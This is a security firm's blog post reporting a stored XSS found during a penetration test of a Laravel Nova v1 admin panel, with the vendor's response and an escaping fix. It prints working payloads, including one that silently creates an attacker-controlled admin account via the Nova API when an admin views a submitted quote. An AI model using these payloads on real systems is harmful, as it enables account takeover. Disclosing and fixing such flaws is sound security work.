Taking Over Laravel Nova Admin Panel via an XSS Attack

September 11, 2020

While doing a penetration-test for a client we noticed that Laravel Nova Textarea field is not encoding HTML which can lead to an account takeover in this case. Describing the details below.

The client has a form on their website where customers can request a quote and that quote will be shown in the admin panel which is built on Laravel Nova.

We tried to submit

<input onfocus="alert('xss')" autofocus />  test

as a comment in the website

XSS payload in the submit form

and the script got executed in the admin panel when the admin opened the requested quote details. Laravel Nova admin panel xss

So using this vulnerability, we submitted the following code as a comment

<input 
   onfocus='Nova.request().post("/nova-api/users", 
   {name:"MaliciousUser", email: "MaliciousUser@example.com", password:      "test123", });' 
  autofocus />  
  test

which got executed successfully when admin opened the quote XSS In Laravel Nova and created an admin account with the attacker's credentials. And this allowed us to log in to the system as an admin. Laravel admin panel takover

We email about the vulnerability to Laravel team and got a response that they can not reproduce the issue on Nova v3, and would recommend to upgrade the Nova version to v3.

If you are using Laravel Nova v1 and upgrade will take longger, a temporary fix can be also be to escape the output in the textarea callback method, so this is what we did as a temporary fix for the client, before they would upgrade to the new version.

Textarea::make('Additional Comments', function(){
  return e($this->additional_comments);
}),

📖 If you want to read more about Laravel Security, check out our Laravel Security Ebook.

Contact us today
for a free consultation.
Do not delay when it comes to security.
Contact us today for a free consultation.
    Thanks for contacting us!
    We will be in touch with you shortly.